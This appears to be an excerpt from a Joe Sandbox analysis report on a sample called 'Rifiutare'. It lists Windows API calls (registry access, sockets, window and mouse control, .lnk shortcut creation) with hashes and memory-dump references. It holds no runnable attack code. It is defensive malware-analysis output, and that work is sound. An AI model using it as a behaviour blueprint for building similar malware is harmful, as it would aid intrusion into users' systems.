                                                                                • LockResource.KERNEL32(00C73BC0,?,?,00C73BC0,?,?,00000000,00000000,?,?,?,?,?,?,00C32C35,?), ref: 00CA3937
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                • String ID: SCRIPT
                                                                                • API String ID: 3051347437-3967369404
                                                                                • Opcode ID: 99605fd073b65b23873c3ce1489ba5abae333d77703f56d3d42719019d50ab28
                                                                                • Instruction ID: 74fab2fcdb277364724ea00e48e19519558353c38ab8a1aa4131c634c8dfc302
                                                                                • Opcode Fuzzy Hash: 99605fd073b65b23873c3ce1489ba5abae333d77703f56d3d42719019d50ab28
                                                                                • Instruction Fuzzy Hash: 60117970200702BFE7258B25DC48F2BBBBDEBC6B54F14416DF512962A0DBB1ED008A30
                                                                                APIs
                                                                                • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00C9E1EA
                                                                                • LoadStringW.USER32(00000000), ref: 00C9E1F1
                                                                                • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00C9E207
                                                                                • LoadStringW.USER32(00000000), ref: 00C9E20E
                                                                                • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00C9E252
                                                                                Strings
                                                                                • %s (%d) : ==> %s: %s %s, xrefs: 00C9E22F
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: HandleLoadModuleString$Message
                                                                                • String ID: %s (%d) : ==> %s: %s %s
                                                                                • API String ID: 4072794657-3128320259
                                                                                • Opcode ID: 8a6ecef440cc44b04518c92a54fbd9a6d077fb128e27df9c0fda7b050a6def86
                                                                                • Instruction ID: 3cfef40661523278ec0fba73164868d93f4b5756cf1529db647259b72ce22fa3
                                                                                • Opcode Fuzzy Hash: 8a6ecef440cc44b04518c92a54fbd9a6d077fb128e27df9c0fda7b050a6def86
                                                                                • Instruction Fuzzy Hash: CB016DF69002087FEB10A7A0CD89FEA776CEB08304F0045A5F74AE2051EA749E858B75
                                                                                APIs
                                                                                • InterlockedExchange.KERNEL32(?,?), ref: 00CA11BF
                                                                                • EnterCriticalSection.KERNEL32(00000000,?), ref: 00CA11D1
                                                                                • TerminateThread.KERNEL32(00000000,000001F6), ref: 00CA11DF
                                                                                • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00CA11ED
                                                                                • CloseHandle.KERNEL32(00000000), ref: 00CA11FC
                                                                                • InterlockedExchange.KERNEL32(?,000001F6), ref: 00CA120C
                                                                                • LeaveCriticalSection.KERNEL32(00000000), ref: 00CA1213
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                • String ID:
                                                                                • API String ID: 3495660284-0
                                                                                • Opcode ID: fe6eca42ef2c54769e65c0f66639a746f0d71da57f4cc7733aaf1aadc9f53b37
                                                                                • Instruction ID: 3f70abf0c4166b271d3cc782882f290135a5a9e03e460769b291502f39e451dc
                                                                                • Opcode Fuzzy Hash: fe6eca42ef2c54769e65c0f66639a746f0d71da57f4cc7733aaf1aadc9f53b37
                                                                                • Instruction Fuzzy Hash: 67F03732160602BBD3465F64ED88FCABB39FF05712F441231F602928B18B74E962CB90
                                                                                APIs
                                                                                • GetClientRect.USER32(?,?), ref: 00C36AD3
                                                                                • GetWindowRect.USER32(?,?), ref: 00C36B14
                                                                                • ScreenToClient.USER32(?,?), ref: 00C36B3C
                                                                                • GetClientRect.USER32(?,?), ref: 00C36C7A
                                                                                • GetWindowRect.USER32(?,?), ref: 00C36C9B
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: Rect$Client$Window$Screen
                                                                                • String ID:
                                                                                • API String ID: 1296646539-0
                                                                                • Opcode ID: 0bdf736523c5264f15ab8629a8add2e0b6cc7bbb87c2db98937dc0a42c914b0c
                                                                                • Instruction ID: 14bc626f61066a15a3a018ca7333ba23ce1c65d723fcf9dd3b8e397177f422df
                                                                                • Opcode Fuzzy Hash: 0bdf736523c5264f15ab8629a8add2e0b6cc7bbb87c2db98937dc0a42c914b0c
                                                                                • Instruction Fuzzy Hash: ECB17A74A1064AEBDB10CFA9C4807EEB7F1FF48310F14D51AE8AAD7240DB74AA51DB54
                                                                                APIs
                                                                                • __allrem.LIBCMT ref: 00C6044A
                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C60466
                                                                                • __allrem.LIBCMT ref: 00C6047D
                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C6049B
                                                                                • __allrem.LIBCMT ref: 00C604B2
                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C604D0
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                • String ID:
                                                                                • API String ID: 1992179935-0
                                                                                • Opcode ID: 7337b25004345450972f1f3d96e8895c16dc5238059ecd9b48f8c4751e578d59
                                                                                • Instruction ID: 3b2abe380c631a44d88db5db4a89c05263626ea354cb2afecacc3610b3626567
                                                                                • Opcode Fuzzy Hash: 7337b25004345450972f1f3d96e8895c16dc5238059ecd9b48f8c4751e578d59
                                                                                • Instruction Fuzzy Hash: 7081E6726007069BE7349E69CCC1B6B73E8EF90360F34453EF621E6691EB70DA419750
                                                                                APIs
                                                                                  • Part of subcall function 00CB391C: select.WSOCK32(00000000,?,00000000,00000000,?,?,?,00000000,?,?,?,00CB1862,00000000,?,?,00000000), ref: 00CB3968
                                                                                • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00CB2606
                                                                                • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00CB2627
                                                                                • WSAGetLastError.WSOCK32 ref: 00CB2638
                                                                                • inet_ntoa.WSOCK32(?), ref: 00CB26D2
                                                                                • htons.WSOCK32(?,?,?,?,?), ref: 00CB2721
                                                                                • _strlen.LIBCMT ref: 00CB277B
                                                                                  • Part of subcall function 00C941FC: _strlen.LIBCMT ref: 00C94206
                                                                                  • Part of subcall function 00C3B2E8: MultiByteToWideChar.KERNEL32(00000000,00000001,00CCDBF4,00C913AC,00000000,00000000,00000000,?,00CCDBF4,00CCDBF4,?,00C9D377,00CCDBF4,?,?), ref: 00C3B304
                                                                                  • Part of subcall function 00C3B2E8: MultiByteToWideChar.KERNEL32(00000000,00000001,?,00C913AC,00000000,?,00000000,?,00CCDBF4,00CCDBF4,?,00C9D377,00CCDBF4,?,?), ref: 00C3B337
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: ByteCharMultiWide_strlen$ErrorLasthtonsinet_ntoaselect
                                                                                • String ID:
                                                                                • API String ID: 1923757996-0
                                                                                • Opcode ID: 2e1fa8d695b761dd7077a3f58d09e2f3451914bf26c7581eb30d63bc85d4d801
                                                                                • Instruction ID: 2d3f4da38f3accadb1550a4c28079a339f8bfb9166af3ca0f417fb16441e17e4
                                                                                • Opcode Fuzzy Hash: 2e1fa8d695b761dd7077a3f58d09e2f3451914bf26c7581eb30d63bc85d4d801
                                                                                • Instruction Fuzzy Hash: F0A1D171504300AFC324DF24C895FAA7BE5AF84314F54894CF4A69B2E2DB31EE86CB91
                                                                                APIs
                                                                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00C586F9,00C586F9,?,?,?,00C6686F,00000001,00000001,8BE85006), ref: 00C66678
                                                                                • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00C6686F,00000001,00000001,8BE85006,?,?,?), ref: 00C666FE
                                                                                • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00C667F8
                                                                                • __freea.LIBCMT ref: 00C66805
                                                                                  • Part of subcall function 00C63C40: RtlAllocateHeap.NTDLL(00000000,00000000,?,?,00C50215,00000000,?,00C38E5F,00000004,?,00C74C6B,?,?,00C310E8,00CCDBF4), ref: 00C63C72
                                                                                • __freea.LIBCMT ref: 00C6680E
                                                                                • __freea.LIBCMT ref: 00C66833
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                • String ID:
                                                                                • API String ID: 1414292761-0
                                                                                • Opcode ID: 20462ca54d2b822cfd66d54e583b65d5ace454a5162453df8db114a81493d7fa
                                                                                • Instruction ID: 99699f0e9894059ef2d10785bd6f71db3d0e3ab15d692622e4bccc1249633bb2
                                                                                • Opcode Fuzzy Hash: 20462ca54d2b822cfd66d54e583b65d5ace454a5162453df8db114a81493d7fa
                                                                                • Instruction Fuzzy Hash: 4251BF72600216ABEB358F64CCC1EAE77AAEF48754F294629FC15E7180EB34DD40D6A0
                                                                                APIs
                                                                                  • Part of subcall function 00C3C110: _wcslen.LIBCMT ref: 00C3C11A
                                                                                  • Part of subcall function 00CBD11B: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00CBBE2E,?,?), ref: 00CBD138
                                                                                  • Part of subcall function 00CBD11B: _wcslen.LIBCMT ref: 00CBD174
                                                                                  • Part of subcall function 00CBD11B: _wcslen.LIBCMT ref: 00CBD1E2
                                                                                  • Part of subcall function 00CBD11B: _wcslen.LIBCMT ref: 00CBD218
                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00CBC44A
                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00CBC4A5
                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 00CBC4EA
                                                                                • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00CBC519
                                                                                • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00CBC573
                                                                                • RegCloseKey.ADVAPI32(?), ref: 00CBC57F
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                                • String ID:
                                                                                • API String ID: 1120388591-0
                                                                                • Opcode ID: 62766f8885794d1e16950d04a8eeba6a891500d06eeec27963377bd3beaea9b2
                                                                                • Instruction ID: 901faf0068260b3655adfc8717ba1b2710761bc1fb6a9529e012588b0c2c5491
                                                                                • Opcode Fuzzy Hash: 62766f8885794d1e16950d04a8eeba6a891500d06eeec27963377bd3beaea9b2
                                                                                • Instruction Fuzzy Hash: 1581A071208241AFC714DF24C8D5E6ABBE5FF84308F14856CF4568B2A2DB31EE45DB92
                                                                                APIs
                                                                                • _wcslen.LIBCMT ref: 00CA6DF3
                                                                                • CoInitialize.OLE32(00000000), ref: 00CA6F50
                                                                                • CoCreateInstance.OLE32(00CD0CBC,00000000,00000001,00CD0B2C,?), ref: 00CA6F67
                                                                                • CoUninitialize.OLE32 ref: 00CA71EB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                • String ID: .lnk
                                                                                • API String ID: 886957087-24824748
                                                                                • Opcode ID: f18849714e75531243c21f89f51dbbfba58ef5165495108dfaf1a627937d5393
                                                                                • Instruction ID: 95f1dc398f517331181b7ad545fd84d0bab1a45398cb1a19b676f1ba83336ee6
                                                                                • Opcode Fuzzy Hash: f18849714e75531243c21f89f51dbbfba58ef5165495108dfaf1a627937d5393
                                                                                • Instruction Fuzzy Hash: 0BD15871618201AFC304EF24C881E6BB7E9FF85308F04496DF5968B2A2DB71ED45CB92
                                                                                APIs
                                                                                • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,00C8FA1A,00000000,?,?,00000000,?,00C735E0,00000004,00000000,00000000), ref: 00CC8854
                                                                                • EnableWindow.USER32(?,00000000), ref: 00CC887A
                                                                                • ShowWindow.USER32(FFFFFFFF,00000000), ref: 00CC88D9
                                                                                • ShowWindow.USER32(?,00000004), ref: 00CC88ED
                                                                                • EnableWindow.USER32(?,00000001), ref: 00CC8913
                                                                                • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00CC8937
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: Window$Show$Enable$MessageSend
                                                                                • String ID:
                                                                                • API String ID: 642888154-0
                                                                                • Opcode ID: 75dec6b222824534b9d8c6b372ee8975034a8342965010738dcf731d17abc3d3
                                                                                • Instruction ID: 192a59dffb6cdd78920e206975dd2ef57fc983d39a021fd28f1f0c6d2d503a96
                                                                                • Opcode Fuzzy Hash: 75dec6b222824534b9d8c6b372ee8975034a8342965010738dcf731d17abc3d3
                                                                                • Instruction Fuzzy Hash: 7641B434601240EFDB29CF24D889FB67BE1FB45314F9841ADE5598B2B2CB31AA49CF51
                                                                                APIs
                                                                                • InterlockedExchange.KERNEL32(?,000001F5), ref: 00CA1060
                                                                                • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00CA1097
                                                                                • EnterCriticalSection.KERNEL32(?), ref: 00CA10B3
                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 00CA112D
                                                                                • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00CA1142
                                                                                • InterlockedExchange.KERNEL32(?,000001F6), ref: 00CA1161
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                                                • String ID:
                                                                                • API String ID: 3368777196-0
                                                                                • Opcode ID: b4336a0fb7be5f0f7e7d26df8c3af7ac79e061469ddd945e9d340ffab15fd5fd
                                                                                • Instruction ID: 3476d5e4df8870a9c0ec43f2fe55f5306cd40ffe854e45551ddb03982dd85293
                                                                                • Opcode Fuzzy Hash: b4336a0fb7be5f0f7e7d26df8c3af7ac79e061469ddd945e9d340ffab15fd5fd
                                                                                • Instruction Fuzzy Hash: D8318D71900205ABCB00AF94DC89FAEB7B8FF45310F2880A5FD00EB246DB70DA55DB64
                                                                                APIs
                                                                                • GetForegroundWindow.USER32(?,?,00000000), ref: 00CB2B2E
                                                                                  • Part of subcall function 00CAED1C: GetWindowRect.USER32(?,?), ref: 00CAED34
                                                                                • GetDesktopWindow.USER32 ref: 00CB2B58
                                                                                • GetWindowRect.USER32(00000000), ref: 00CB2B5F
                                                                                • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00CB2B91
                                                                                  • Part of subcall function 00C9F152: Sleep.KERNEL32 ref: 00C9F1CA
                                                                                • GetCursorPos.USER32(?), ref: 00CB2BBD
                                                                                • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00CB2C1B
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                                • String ID:
                                                                                • API String ID: 4137160315-0
                                                                                • Opcode ID: 47090b74002f2b883336d20548ab3f4c7d670b5b9d92164c9a80f405729e788c
                                                                                • Instruction ID: ed006285d224521e9856ccf01a88e40339d5faec12409cb08da1847ba65e80de
                                                                                • Opcode Fuzzy Hash: 47090b74002f2b883336d20548ab3f4c7d670b5b9d92164c9a80f405729e788c
                                                                                • Instruction Fuzzy Hash: EF31B072505306AFD720DF54C849F9FB7A9FF89318F000929F59AA7191DA70EA09CB92
                                                                                APIs
                                                                                • IsWindowVisible.USER32(?), ref: 00C954B1
                                                                                • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00C954CE
                                                                                • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00C95506
                                                                                • _wcslen.LIBCMT ref: 00C95524
                                                                                • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00C9552C
                                                                                • _wcsstr.LIBVCRUNTIME ref: 00C95536
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                                                                • String ID:
                                                                                • API String ID: 72514467-0
                                                                                • Opcode ID: 323c437c53e496270ad22023b03b27626afd220cb5b20a3e99c857e6fe8c5cd1
                                                                                • Instruction ID: e19e7f1b2207fff893273f1dcbfc873d9069a3759e585c53c2fab4426e64f5ca
                                                                                • Opcode Fuzzy Hash: 323c437c53e496270ad22023b03b27626afd220cb5b20a3e99c857e6fe8c5cd1
                                                                                • Instruction Fuzzy Hash: 6C21FF72204600AAEF165B69DC0DF7F7BA9DF45761F108069FC0ACA192EA70DD81E7A0
                                                                                APIs
                                                                                  • Part of subcall function 00C350F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C35035,?,?,00C74641,?,?,00000100,00000000,00000000,CMDLINE), ref: 00C35117
                                                                                • _wcslen.LIBCMT ref: 00CA6192
                                                                                • CoInitialize.OLE32(00000000), ref: 00CA62AC
                                                                                • CoCreateInstance.OLE32(00CD0CBC,00000000,00000001,00CD0B2C,?), ref: 00CA62C5
                                                                                • CoUninitialize.OLE32 ref: 00CA62E3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                                                • String ID: .lnk
                                                                                • API String ID: 3172280962-24824748
                                                                                • Opcode ID: fd9f1269c535e9a1afa0ab7747b846590ebf2e016b2545d31805ed6778cc11a6
                                                                                • Instruction ID: 0b40e93977a7445723a23a5afe71a72e5d4a048cf10a357f2e11d2335de62644
                                                                                • Opcode Fuzzy Hash: fd9f1269c535e9a1afa0ab7747b846590ebf2e016b2545d31805ed6778cc11a6
                                                                                • Instruction Fuzzy Hash: C5D142716043029FC714DF24C484A2ABBE5FF8A718F18895DF89AAB361D731ED45CB92
                                                                                APIs
                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00CC82ED
                                                                                • SetWindowLongW.USER32(00000000,000000F0,?), ref: 00CC8312
                                                                                • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00CC832A
                                                                                • GetSystemMetrics.USER32(00000004), ref: 00CC8353
                                                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00CABFE0,00000000), ref: 00CC8373
